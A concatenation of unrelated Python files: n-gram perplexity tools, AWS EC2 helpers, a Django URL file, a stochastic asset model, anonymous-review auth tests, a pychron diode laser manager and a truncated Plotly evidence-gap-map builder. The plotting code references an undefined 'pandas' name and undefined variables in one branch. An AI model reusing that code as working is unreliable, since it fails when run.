sys.stderr.write("Unable to parse ppl from:\n") sys.stderr.write(output[1]) sys.stderr.write("\n") sys.exit(1) return perplexity, num_oovs # Segments text according to given word segmentation, to be used as subword # language model training data. def segment_text(input_file, output_file, wsegs): for line in input_file: line = line.strip() words = line.split() output_file.write(" ") for word in words: subwords = wsegs[word] for sw in subwords: output_file.write(sw) output_file.write(" ") output_file.write(" ") output_file.write("\n") def subword_perplexity(train_text, devel_text, wsegs, order=3): if wsegs is None: segmented_train_text = train_text segmented_devel_text = devel_text else: segmented_train_text = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") segment_text(train_text, segmented_train_text, wsegs) segmented_devel_text = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") segment_text(devel_text, segmented_devel_text, wsegs) lm_file = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") command = [ 'ngram-count', '-order', str(order), '-wbdiscount1', '-wbdiscount2', '-wbdiscount3', '-interpolate1', '-interpolate2', '-interpolate3', '-text', segmented_train_text.name, '-lm', lm_file.name ] subprocess.check_call(command) command = [ 'perplexity', '-a', lm_file.name, '-t', '2', segmented_devel_text.name, '-'] output = subprocess.check_output(command, stderr=subprocess.STDOUT).decode('utf-8') matches = re.search('^Dropped:\s*(\d+) UNKS', output, re.MULTILINE) if matches: num_oovs = int(matches.group(1)) else: sys.stderr.write("Unable to parse UNKS from:\n") sys.stderr.write(output) sys.exit(1) matches = re.search('^Perplexity (\d+(.\d+)?)', output, re.MULTILINE) if matches: perplexity = float(matches.group(1)) else: sys.stderr.write("Unable to parse Perplexity from:\n") sys.stderr.write(output) sys.exit(1) return perplexity, num_oovs import boto3 import os import requests from settings import DEFAULT_REGION, KEYNAME session = boto3.session.Session(region_name=DEFAULT_REGION, profile_name=KEYNAME) def get_public_ip(instance_ids): ec2_client = session.client("ec2") reservations = ec2_client.describe_instances(InstanceIds=instance_ids).get( "Reservations" ) for reservation in reservations: for instance in reservation["Instances"]: return instance.get("PublicIpAddress") def get_running_instances(): ec2_client = session.client("ec2") reservations = ec2_client.describe_instances( Filters=[{"Name": "instance-state-name", "Values": ["running"],}] ).get("Reservations") instances = [] for reservation in reservations: for instance in reservation["Instances"]: instance_id = instance["InstanceId"] instance_type = instance["InstanceType"] public_ip = instance["PublicIpAddress"] private_ip = instance["PrivateIpAddress"] instances.append( f"{instance_id}, {instance_type}, {public_ip}, {private_ip}" ) return instances def get_instance_status(instance_id): ec2_client = session.client("ec2") if instance_id: reservations = ec2_client.describe_instances(InstanceIds=[instance_id]).get( "Reservations" ) else: reservations = ec2_client.describe_instances().get("Reservations") instances_status = [] for reservation in reservations: for instance in reservation["Instances"]: instance_id = instance["InstanceId"] instance_type = instance["InstanceType"] instance_status = instance["State"]["Name"] public_dns_name = instance["PublicDnsName"] link_details = "Server is spinning up" if instance_status == "running": link_details = "Server is up and docker is spinning up right now" try: response = requests.get(f"http://{public_dns_name}") if response.status_code == 200: link_details = f"The site is up and running. please visit http://{public_dns_name}" except: link_details = "Server is up and docker is spinning up right now" elif instance_status == "terminated": link_details = "Server is terminated" elif instance_status == "shutting-down": link_details = "Server is shutting down" else: link_details = "" instances_status.append( f"{instance_id}, {instance_type}, {instance_status}, {link_details}" ) return instances_status def stop_instance(instance_id): ec2_client = session.client("ec2") response = ec2_client.stop_instances(InstanceIds=[instance_id]) return response def terminate_instance(instance_id): ec2_client = session.client("ec2") response = ec2_client.terminate_instances(InstanceIds=[instance_id]) return response def create_key_pair(): ec2_client = session.client("ec2") key_pair = ec2_client.create_key_pair(KeyName=KEYNAME) private_key = key_pair["KeyMaterial"] # write private key to file with 400 permissions with os.fdopen( os.open("/tmp/aws_ec2_key.pem", os.O_WRONLY | os.O_CREAT, 0o400), "w+" ) as handle: handle.write(private_key) app/home/urls.py from django.urls import path from .views import DashboardView, IndexView urlpatterns = [ path("", IndexView.as_view(), name="home"), path("dashboard/", DashboardView.as_view(), name="dashboard"), ] example_models/stochastic_model.py # -*- coding: utf-8 -*- """ Created on Mon Mar 16 20:36:22 2020 @author: user """ from heavymodel import Model, Data import random import pandas as pd import seaborn as sns sns.set() rng = random.Random(0) # seed set to ensure replicable. class Asset(Model): def asset_value(self, t): if t == 0: return self.initial_fund else: return self.asset_value(t-1) * (1 + self.inv_growth(t)) def inv_growth(self, t): return rng.normalvariate(self.mu, self.sigma) data = Data(dict(mu=0.04, sigma=0.06, initial_fund=1000)) simulations = 1000 results = [] for count, sim in enumerate(range(simulations)): asset = Asset(data=data) asset._run(61) results.append(asset.asset_value(60)) result_df = pd.DataFrame(data={"asset_value":results}) sns.kdeplot(result_df["asset_value"]) import pytest from gtmcore.configuration import Configuration from gtmcore.fixtures.auth import mock_config_file_with_auth_anon_review, mock_config_file_with_auth_multi_anon_review from gtmcore.auth.identity import get_identity_manager_class, AuthenticationError from gtmcore.auth.anon_review import AnonymousReviewIdentityManager from gtmcore.auth import User class TestIdentityAnonReview(object): def test_is_session_valid(self, mock_config_file_with_auth_anon_review): """test check for valid session""" config = Configuration() # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secret = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Invalid with no token assert mgr.is_token_valid() is False assert mgr.is_token_valid(None) is False # Junk base64 encoded data should be False too assert mgr.is_token_valid("") is False # A proper "anonymous" bearer token will be considered valid assert mgr.is_token_valid(anon_review_secret) is True def test_is_authenticated_token(self, mock_config_file_with_auth_anon_review): """test checking if we have the right token""" config = Configuration() # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secret = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Invalid with no token assert mgr.is_authenticated() is False assert mgr.is_authenticated(None) is False assert mgr.is_authenticated(anon_review_secret) is True def test_get_anon_user_profile(self, mock_config_file_with_auth_anon_review): """test getting a user profile when anonymous""" config = Configuration() # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secret = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Load User with pytest.raises(AuthenticationError): # Should fail without a token mgr.get_user_profile() # Load User u = mgr.get_user_profile(anon_review_secret) assert type(u) == User assert u.username == "anonymous1" assert u.email == "" assert u.given_name == "Anonymous" assert u.family_name == "Reviewer-1" def test_get_multi_anon_user_profile(self, mock_config_file_with_auth_multi_anon_review): """test getting a user profile when anonymous""" config = Configuration(mock_config_file_with_auth_multi_anon_review) # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secrets = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Load User with pytest.raises(AuthenticationError): # Should fail without a token mgr.get_user_profile() # Load Users for i, secret in enumerate(anon_review_secrets): u = mgr.get_user_profile(secret) assert type(u) == User assert u.username == f"anonymous{i+1}" assert u.email == "" assert u.given_name == "Anonymous" assert u.family_name == f"Reviewer-{i+1}" # =============================================================================== # Copyright 2011 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # =============enthought library imports======================= from __future__ import absolute_import from threading import Timer from traits.api import Instance, Button, Bool, Float from traitsui.api import VGroup, Item, InstanceEditor from .fusions_laser_manager import FusionsLaserManager from pychron.hardware.fusions.fusions_diode_logic_board import FusionsDiodeLogicBoard from pychron.hardware.mikron_pyrometer import MikronGA140Pyrometer from pychron.hardware.pyrometer_temperature_monitor import PyrometerTemperatureMonitor from pychron.hardware.temperature_monitor import DPi32TemperatureMonitor from pychron.hardware.watlow.watlow_ezzone import WatlowEZZone from pychron.lasers.laser_managers.vue_metrix_manager import VueMetrixManager from pychron.monitors.fusions_diode_laser_monitor import FusionsDiodeLaserMonitor from pychron.response_recorder import ResponseRecorder class FusionsDiodeManager(FusionsLaserManager): """ """ stage_manager_id = 'fusions.diode' id = 'pychron.fusions.diode' # name = 'fusions_diode' name = 'FusionsDiode' configuration_dir_name = 'fusions_diode' pyrometer = Instance(MikronGA140Pyrometer) temperature_controller = Instance(WatlowEZZone) temperature_monitor = Instance(DPi32TemperatureMonitor) control_module_manager = Instance(VueMetrixManager) pyrometer_temperature_monitor = Instance(PyrometerTemperatureMonitor) tune = Button configure = Button tuning = Bool # laser_measured_power = Float # thermocouple_temp = Float # update_timers = List monitor_name = 'diode_laser_monitor' monitor_klass = FusionsDiodeLaserMonitor use_power_slider = Bool(True) request_power = Float request_powermin = Float(0) request_powermax = Float(1500) # dbname = paths.diodelaser_db # db_root = paths.diodelaser_db_root use_calibrated_temperature = Bool(False) def _use_calibrated_temperature_changed(self, new): if self.temperature_controller: self.temperature_controller.use_calibrated_temperature = new def map_temperature(self, v): # if self.use_calibrated_temperature: v = self.temperature_controller.map_temperature(v) return v def get_pyrometer_temperature(self, **kw): """ """ return self._try('pyrometer', 'read_temperature', kw) def get_laser_internal_temperature(self, **kw): """ """ return self._try('control_module_manager', 'get_internal_temperature', kw) def get_power_slider(self): return None def get_lens_configuration_group(self): return None def load_lens_configurations(self): pass def emergency_shutoff(self, *args, **kw): super(FusionsDiodeManager, self).emergency_shutoff(*args, **kw) self.control_module_manager.disable() self.temperature_controller.set_control_mode('open') self.temperature_controller.set_open_loop_setpoint(0.0) def set_laser_output(self, value, units): self.debug('set laser output value={} units={}'.format(value, units)) if units == 'temp': self.set_laser_temperature(value) else: self.set_laser_power(value, units) def set_laser_temperature(self, temp, set_pid=True): return self._set_laser_power_hook(temp, mode='closed', set_pid=set_pid) # use_calibration=self.use_calibrated_temperature) # =============================================================================== # private # =============================================================================== def _set_laser_power_hook(self, power, mode='open', set_pid=True, **kw): tc = self.temperature_controller if tc.control_mode != mode: tc.set_control_mode(mode) power = float(power) if mode == 'closed' and set_pid and power: tc.set_pid(power) func = getattr(tc, 'set_{}_loop_setpoint'.format(mode)) func(power, set_pid=set_pid, **kw) def _enable_hook(self, clear_setpoint=True): if super(FusionsDiodeManager, self)._enable_hook(): # logic board sucessfully enabled if clear_setpoint: # disable the temperature_controller unit a value is set self.temperature_controller.disable() self.response_recorder.start('diode_response_tc_control') if self.pyrometer: self.pyrometer.start_scan() return self.control_module_manager.enable() def _disable_hook(self): self.response_recorder.stop() self.temperature_controller.disable() self.control_module_manager.disable() if self.pyrometer: self.pyrometer.stop_scan() return super(FusionsDiodeManager, self)._disable_hook() def _try(self, obj, func, kw): try: obj = getattr(self, obj) func = getattr(obj, func) return func(**kw) except AttributeError: pass # =============================================================================== # views # =============================================================================== def get_additional_controls(self): # v = Group( gs = [VGroup(Item('temperature_controller', style='custom', editor=InstanceEditor(view='control_view'), show_label=False, ), label='Watlow'), VGroup(Item('pyrometer', show_label=False, style='custom'), label='Pyrometer'), VGroup(Item('control_module_manager', show_label=False, style='custom'), label='ControlModule'), VGroup(Item('fiber_light', style='custom', show_label=False), label='FiberLight')] return gs # =============================================================================== # defaults # =============================================================================== def _response_recorder_default(self): r = ResponseRecorder(response_device=self.temperature_controller, # response_device_secondary = self.temperature_monitor, response_device_secondary=self.pyrometer, output_device=self.temperature_controller) return r def _temperature_monitor_default(self): tm = DPi32TemperatureMonitor(name='temperature_monitor', configuration_dir_name=self.configuration_dir_name) return tm def _pyrometer_default(self): p = MikronGA140Pyrometer(name='pyrometer', configuration_dir_name=self.configuration_dir_name) return p def _laser_controller_default(self): b = FusionsDiodeLogicBoard(name='laser_controller', configuration_name='laser_controller', configuration_dir_name=self.configuration_dir_name) return b def _stage_manager_default(self): args = dict(name='stage', configuration_name='stage', configuration_dir_name=self.configuration_dir_name, parent=self) return self._stage_manager_factory(args) def _temperature_controller_default(self): w = WatlowEZZone(name='temperature_controller', use_calibrated_temperature=self.use_calibrated_temperature, configuration_dir_name=self.configuration_dir_name) return w def _pyrometer_temperature_monitor_default(self): py = PyrometerTemperatureMonitor(name='pyrometer_tm', configuration_dir_name=self.configuration_dir_name) return py def _title_default(self): return 'Diode Manager' def _control_module_manager_default(self): v = VueMetrixManager() # control = self.control_module) return v if __name__ == '__main__': from pychron.core.helpers.logger_setup import logging_setup from pychron.envisage.initialization.initializer import Initializer logging_setup('fusions diode') f = FusionsDiodeManager() f.use_video = True f.record_brightness = True ini = Initializer() a = dict(manager=f, name='FusionsDiode') ini.add_initialization(a) ini.run() # f.bootstrap() f.configure_traits() # ======================= EOF ============================ # def finish_loading(self): # super(FusionsDiodeManager, self).finish_loading() # # self.pyrometer.start_scan() # # self.control_module_manager.start_scan() # def open_scanner(self): # from pychron.lasers.scanner import PIDScanner # # self._open_scanner(PIDScanner, 'scanner.yaml') # # def open_autotuner(self): # from pychron.lasers.autotuner import AutoTuner # # self._open_scanner(AutoTuner, 'autotuner.yaml') # # def _open_scanner(self, klass, name): # from pychron.lasers.scanner import ScannerController # # p = os.path.join(paths.scripts_dir, name) # # s = klass(control_path=p, # manager=self # ) # # tc = self.temperature_controller # tm = self.get_device('temperature_monitor') # # def tc_gen(): # while 1: # pr = tc.get_temp_and_power(verbose=False) # for pi in pr.data: # yield pi # # # populate scanner with functions # gen = tc_gen() # s.setup(directory='diode_autotune_scans') # s.new_function(gen, name='Temp. Pyrometer (C)') # s.new_function(gen, name='Power (%)') # # if tm is not None: # func = partial(tm.read_temperature, verbose=False) # s.new_function(func, name='Reflector Temp (C)') # # # bind to request_power change. set Setpoint static value # s.new_static_value('Setpoint') # self.on_trait_change(lambda v: s.set_static_value('Setpoint', v), self._requested_power) # # # bind to Scanner's stop_event. Set laser power to 0. # s.on_trait_change(lambda: self.set_laser_temperature(0), 'stop_event') # # # bind to Scanners setpoint # # s.on_trait_change(lambda v: self.set_laser_temperature(v), 'setpoint') # # sc = ScannerController(model=s, # application=self.application) # self.open_view(sc) # def bind_preferences(self, pref_id): # super(FusionsDiodeManager, self).bind_preferences(pref_id) # bind_preference(self, 'use_calibrated_temperature', '{}.use_calibrated_temperature'.format(pref_id)) # def get_laser_amps(self): # ''' # ''' # return self.control_module.read_laser_amps() # # def get_laser_current(self): # ''' # ''' # return self.control_module.read_laser_current_adc() # def get_laser_power(self): # ''' # ''' # return self.control_module.read_laser_power_adc() # # def get_measured_power(self): # ''' # ''' # return self.control_module.read_measured_power() # def disable_laser(self): # ''' # ''' # if self.fiber_light.auto_onoff and not self.fiber_light.state: # self.fiber_light.power_on() # # self.temperature_controller.disable() # self.control_module_manager.disable() # # super(FusionsDiodeManager, self).disable_laser() # # return True # def get_degas_manager(self): # from degas_manager import DegasManager # # # path = self.open_file_dialog(default_directory = os.path.join(scripts_dir, # # 'laserscripts', # # 'degas' # # ) # # ) # # path = '/Users/pychron/Pychrondata_beta/scripts/laserscripts/degas/puck1.rs' # if path: # dm = DegasManager() # dm.parent = self # dm.file_name = path # dm.new_script() # return dm # def launch_camera_scan(self): # ''' # ''' # p = os.path.join(paths.scripts_dir, 'laserscripts', 'camera_scans') # cs = CameraScanScript(manager = self, parent_path = p) # cs.open() # # def launch_power_scan(self): # ''' # overriding super # ''' # p = os.path.join(paths.scripts_dir, 'laserscripts', 'diode_power_scans') # ps = DiodePowerScanScript(manager = self, parent_path = p) # ps.open() # def show_image_process(self): # ''' # ''' # # vm = self.video_manager # p = os.path.join(paths.data_dir, 'video', 'testframe.png') # vm.process_frame(path=p) # vm.edit_traits(view='image_view') # def show_step_heater(self): # # shm = StepHeatManager(laser_manager = self, # video_manager = self.stage_manager.video_manager # ) # shm.edit_traits() # def show_pyrometer_calibration_manager(self): # ''' # ''' # c = CalibrationManager(diode_manager = self, # style = 'pyrometer') # c.open() # # def show_calibration_manager(self): # ''' # ''' # # c = CalibrationManager(diode_manager = self) # c.open() # @on_trait_change('configure') # def _show_temperature_controller_configuration(self): # ''' # ''' # self.temperature_controller.edit_traits(view='configure_view') # def __watlow__group__(self): # ''' # ''' # return VGroup(Item('temperature_controller', style = 'custom', show_label = False), # label = 'Watlow', # show_border = True) # # def __pyrometer__group__(self): # ''' # ''' # return VGroup(Item('pyrometer', show_label = False, style = 'custom'), # show_border = True, # label = 'Pyrometer') # def show_streams(self): # ''' # ''' # # tc = self.temperature_controller # pyro = self.pyrometer # tm = self.pyrometer_temperature_monitor # apm = self.analog_power_meter # ipm = self.control_module # # # avaliable_streams = [apm, pyro, tc, tm, ipm] # @on_trait_change('tune') # def _tune_temperature_controller(self): # ''' # ''' # if not self.tuning: # tune = TuneThread(self) # tune.setDaemon(1) # tune.start() # # self.tuning = not self.tuning # @on_trait_change('calibrate') # def _calibrate_power(self): # ''' # ''' # # cm = CalibrationManager(parent = self) # cm._calibrate_() # cm.edit_traits(kind = 'livemodal') # def _devices_default(self): # ''' # ''' # return [self.pyrometer, # self.temperature_controller, # self.temperature_monitor, # self.analog_power_meter, # self.logic_board, # self.control_module, # self.stage_controller] # def launch_power_profile(self): # ''' # ''' # self.logger.info('launching power profile') # # sm = self.stream_manager # tc = self.temperature_controller # pyro = self.pyrometer # stm = self.stage_manager # apm = self.analog_power_meter # # self.raster_manager = rm = RasterManager(stream_manager = sm) # # if not stm.centered: # self.warning('Please set a center position') # # return # p=os.path.join(preferences.root,'laserscripts','beamprofile.txt') # pt = BeamProfileThread(self,p) # rm.set_canvas_parameters(pt.steps, pt.steps) # # if sm.open_stream_loader([pyro, tc, apm]): # self.dirty = True # # #setup the data frame # dm = sm.data_manager # if not self.streaming: # self.streaming = True # # dm.add_group('molectron') # for i in range(10): # dm.add_group('row%i' % i, parent = 'root.molectron') # for j in range(10): # dm.add_group('cell%i%i' % (i, j), parent = 'root.molectron.row%i' % i) # dm.add_table('power', parent = 'root.molectron.row%i.cell%i%i' % (i, i, j)) # # #stm.edit_traits(kind = 'livemodal') # pt.center_x = stm.center_x # pt.center_y = stm.center_y # # pt.start() # rm.edit_traits() # def get_calibration_menu(self): # d = super(FusionsDiodeManager, self).get_calibration_menu() # dn = d[1] + [#dict(name='Calibrate',action='show_calibration_manager'), # dict(name = 'Calibrate Pyrometer', action = 'show_pyrometer_calibration_manager'), # dict(name = 'Camera Scan', action = 'launch_camera_scan'), # dict(name = 'Image Process', action = 'show_image_process') # ] # return (d[0], dn) # def get_control_buttons(self): # ''' # ''' # v = super(FusionsDiodeManager, self).get_control_buttons() # return v + [('pointer', None, None), # #('enable', None, None), # #('interlock', None, None) # ] # def get_menus(self): # ''' # ''' # m = super(FusionsDiodeManager, self).get_menus() # # # # m += [('Calibration', [ # dict(name = 'Tune', action = '_tune_temperature_controller'), # dict(name = 'Calibrate', action = '_calibrate_power'), # #dict(name='Open Graph',action='_open_graph'), # dict(name = 'Power Profile', action = 'launch_power_profile'), # ] # ), # # # ('Streams', [dict(name = 'Stop', action = 'stop_streams', enabled_when = 'streaming'), # # dict(name = 'Stream ...', action = '_launch_stream'), # # dict(name='Save Graph ...', action ='_save_graph', enabled_when='dirty') # # ]) # ] # return m # def show_stats_view(self): # ''' # ''' # # self.timer = t = Timer(1000, self._update_stats) # self.update_timers.append(t) # self.outputfile = open(os.path.join(paths.data_dir, 'laser_stats.txt'), 'w') # self.outputfile.write('time\tlaser power\tmeasured power\tlaser_current\tlaser amps\n') # # self.edit_traits(view = 'stats_view') # # def _update_stats(self): # ''' # ''' # self.laser_power = lp = self.get_laser_power() # self.laser_measured_power = lm = self.get_measured_power() # self.laser_current = lc = self.get_laser_current() # self.laser_amps = la = self.get_laser_amps() # self.outputfile.write('%s\n' % '\t'.join(('%0.3f' % time.time(), '%s' % lp, '%s' % lm, '%s' % lc, '%s' % la))) # # def _request_amps_changed(self): # ''' # ''' # self.control_module.set_request_amps(self.request_amps) # # def stats_view(self): # ''' # ''' # v = View(VGroup(Item('request_amps'), # Item('laser_power'), # Item('laser_measured_power'), # Item('laser_current'), # Item('laser_amps'), # ), # resizable = True, # handler = UpdateHandler # ) # return v import numpy as np import pandas as pd import random def evidencegapmap(dataset, x_column, y_column, xy_column=None, bubble_column=None, bubble_text=None, bubble_link=None, time_column=None, size_column=None, color_column=None, xbin_list=None, ybin_list=None,xbin_size=100, ybin_size=100, x_title=None, y_title=None, title=None, colorbar_title=None, scale_bubble=10, colorscale=None, marker_opacity=None, marker_border_width=None,show_slider=True, show_button=True, show_colorbar=True, show_legend=None, width=None, height=None): ''' Makes the animated and interactive bubble charts from a given dataset.''' # Initialize the number of bins xbin_range = [0,(len(xbin_list)-1)] ybin_range = [0,(len(ybin_list)-1)] #Initialize Axes range x_range=[0,0] y_range=[0,0] # Set category_column as None and update it as color_column only in case # color_column is not None and categorical, in which case set color_column as None category_column = None if color_column: # Can be numerical or categorical if dataset[color_column].dtype.name in ['category', 'object', 'bool']: category_column = color_column color_column = None # Set the plotting mode for the plots inside a cell if xy_column : mode = 'nlpmode' xmax = max(map(lambda xy: xy[0], list(dataset[xy_column]))) xmin = min(map(lambda xy: xy[0], list(dataset[xy_column]))) ymax = max(map(lambda xy: xy[1], list(dataset[xy_column]))) ymin = min(map(lambda xy: xy[1], list(dataset[xy_column]))) xshift = (xmax + xmin)/2 yshift = (ymax + ymin)/2 xy_scale= max(xmax-xmin, ymax-ymin) #print("xmax {}, xmin {}, ymax {}, ymin {}, xshift {}, yshift {} xy_scale {}".format(xmax, xmin, ymax, ymin, xshift, yshift, xy_scale)) else : mode = 'randommode' xy_scale = 1 xshift=yshift =0 # Set the variables for making the grid if time_column: years = dataset[time_column].unique() else: years = None show_slider = False show_button = False column_names = [x_column, y_column] column_names.append(bubble_column) if xy_column: column_names.append(xy_column) if bubble_text: column_names.append(bubble_text) if bubble_link: column_names.append(bubble_link) if size_column: column_names.append(size_column) if color_column: column_names.append(color_column) # Make the grid if category_column: categories = dataset[category_column].unique() col_name_template = '{}+{}+{}_grid' grid = make_grid_with_categories(dataset, column_names, time_column, category_column, years, categories) if show_legend is None: showlegend = True else: showlegend = show_legend # Set the layout if show_slider: slider_scale = years else: slider_scale = None figure, sliders_dict = set_layout(x_title, y_title, title, show_slider, slider_scale, show_button, showlegend, width, height) if size_column: sizeref = 2.*max(dataset[size_column])/(scale_bubble**2) # Set the reference size for the bubbles else: sizeref = None # Add the frames if category_column: # Add the base frame for category in categories: if time_column: year = min(years) # The earliest year for the base frame col_name_template_year = col_name_template.format(year, {}, {}) else: col_name_template_year = '{}+{}_grid' trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column,bubble_text, bubble_link, size_column, sizeref, scale_bubble, marker_opacity, marker_border_width, mode=mode,category=category, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) figure['data'].append(trace) # Add time frames if time_column: # Only if time_column is not None for year in years: frame = {'data': [], 'name': str(year)} for category in categories: col_name_template_year = col_name_template.format(year, {}, {}) trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column, bubble_text, bubble_link, size_column, sizeref, scale_bubble, marker_opacity, marker_border_width ,mode=mode, category=category, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) frame['data'].append(trace) figure['frames'].append(frame) if show_slider: add_slider_steps(sliders_dict, year) else: # Add the base frame if time_column: year = min(years) # The earliest year for the base frame col_name_template_year = col_name_template.format(year, {}) else: col_name_template_year = '{}_grid' trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column, bubble_text, bubble_link, size_column, sizeref, scale_bubble, marker_opacity, marker_border_width, color_column, colorscale, show_colorbar, colorbar_title, mode=mode, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) figure['data'].append(trace) # Add time frames if time_column: # Only if time_column is not None for year in years: col_name_template_year = col_name_template.format(year, {}) frame = {'data': [], 'name': str(year)} trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column, bubble_text, bubble_link,size_column, sizeref, scale_bubble, marker_opacity, marker_border_width, color_column, colorscale, show_colorbar, colorbar_title, mode=mode, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) frame['data'].append(trace) figure['frames'].append(frame) if show_slider: add_slider_steps(sliders_dict, year) # Set ranges for the axes x_range = set_range(dataset[x_column], xbin_size) y_range = set_range(dataset[y_column], ybin_size) figure['layout']['xaxis']['range'] = x_range figure['layout']['yaxis']['range'] = y_range if show_slider: figure['layout']['sliders'] = [sliders_dict] tracepoint = draw_evidence_gap_map_structure_horzero(xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) for i in range(len(ybin_list)+1): tracepoint = draw_evidence_gap_map_structure_hor(i, xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) tracepoint = draw_evidence_gap_map_structure_verzero(xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) for i in range(len(xbin_list)+1): tracepoint = draw_evidence_gap_map_structure_ver(i, xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) return figure def draw_evidence_gap_map_structure_horzero(x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_horizontals_zero= { 'x': [int((xbin/2)+i*(xbin)) for i in range(number_of_xcats)], 'y': [0 for i in range(number_of_xcats)], 'text': [x_list[line] for line in range(number_of_xcats)], 'mode': 'lines+text', 'textposition': 'bottom center', 'showlegend': False } return draw_horizontals_zero def draw_evidence_gap_map_structure_hor(linenum=1, x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_horizontals = { 'x': [int(i*xbin) for i in range(number_of_xcats+1)], 'y': [int(linenum*(ybin)) for i in range(number_of_xcats+1)], 'text': "", 'mode': 'lines', 'showlegend': False } return draw_horizontals def draw_evidence_gap_map_structure_verzero(x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_verticals_zero= { 'x': [0 for i in range(number_of_ycats)], 'y': [int((ybin/2)+i*(ybin)) for i in range(number_of_ycats)], 'text': [y_list[line] for line in range(number_of_ycats)], 'mode': 'lines+text', 'textposition': 'middle left', 'showlegend': False } return draw_verticals_zero def draw_evidence_gap_map_structure_ver(linenum=1, x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_verticals = { 'x': [int(linenum*(xbin)) for i in range(number_of_ycats+1)], 'y': [int(i*ybin) for i in range(number_of_ycats+1)], 'text': "", 'mode': 'lines', 'showlegend': False } return draw_verticals def make_grid_with_categories(dataset, column_names, time_column, category_column, years=None, categories=None): '''Makes the grid for the plot as a pandas DataFrame.''' grid = pandas.DataFrame() if categories is None: categories = dataset[category_column].unique() if time_column: col_name_template = '{}+{}+{}_grid' if years is None: years = dataset[time_column].unique() for year in years: for category in categories: dataset_by_year_and_cat = dataset[(dataset[time_column] == int(year)) & (dataset[category_column] == category)] for col_name in column_names: # Each column name is unique temp = col_name_template.format(year, col_name, category) if dataset_by_year_and_cat[col_name].size != 0: grid = grid.append({'value': list(dataset_by_year_and_cat[col_name]), 'key': temp}, ignore_index=True) else: col_name_template = '{}+{}_grid' for category in categories: dataset_by_cat = dataset[(dataset[category_column] == category)] for col_name in column_names: # Each column name is unique temp = col_name_template.format(col_name, category) if dataset_by_cat[col_name].size != 0: grid = grid.append({'value': list(dataset_by_cat[col_name]), 'key': temp}, ignore_index=True) return grid def set_layout(x_title=None, y_title=None, title=None, show_slider=True, slider_scale=None, show_button=True, show_legend=False, width=None, height=None): '''Sets the layout for the figure.''' # Define the figure object as a dictionary figure = { 'data': [], 'layout': {}, 'frames': [] } # Start with filling the layout first figure = set_2Daxes(figure, x_title, y_title) figure['layout']['title'] = title figure['layout']['hovermode'] = 'closest' figure['layout']['showlegend'] = show_legend figure['layout']['margin'] = dict(l=60, b=50, t=50, r=60, pad=10) if width: figure['layout']['width'] = width if height: figure['layout']['height'] = height # Add slider for the time scale if show_slider: sliders_dict = add_slider(figure, slider_scale) else: sliders_dict = {} # Add a pause-play button if show_button: add_button(figure) # Return the figure object return figure, sliders_dict def set_2Daxes(figure, x_title=None, y_title=None): '''Sets 2D axes''' figure['layout']['xaxis'] = {'title': x_title, 'autorange': False, 'showgrid': False, 'zeroline': False, 'showline': False, 'ticks': '', 'showticklabels': False, 'automargin': True} figure['layout']['yaxis'] = {'title': y_title, 'autorange': False, 'showgrid': False, 'zeroline': False, 'showline': False, 'ticks': '', 'showticklabels': False, 'automargin': True} return figure def add_slider(figure, slider_scale): '''Adds slider for animation''' figure['layout']['sliders'] = { 'args': [ 'slider.value', { 'duration': 400, 'ease': 'cubic-in-out' } ], 'initialValue': min(slider_scale), 'plotlycommand': 'animate', 'values': slider_scale, 'visible': True } sliders_dict = { 'active': 0, 'yanchor': 'top', 'xanchor': 'left', 'currentvalue': { 'font': {'size': 20}, 'prefix': 'Year:', 'visible': True, 'xanchor': 'right' }, 'transition': {'duration': 300, 'easing': 'cubic-in-out'}, 'pad': {'b': 10, 't': 50}, 'len': 0.9, 'x': 0.1, 'y': 0, 'steps': [] } return sliders_dict def add_slider_steps(sliders_dict, year): '''Adds the slider steps.''' slider_step = {'args': [ [year], {'frame': {'duration': 300, 'redraw': False}, 'mode': 'immediate', 'transition': {'duration': 300}} ], 'label': str(year), 'method': 'animate'} sliders_dict['steps'].append(slider_step) def add_button(figure): '''Adds the pause-play button for animation''' figure['layout']['updatemenus'] = [ { 'buttons': [ { 'args': [None, {'frame': {'duration': 500, 'redraw': False}, 'fromcurrent': True, 'transition': {'duration': 300, 'easing': 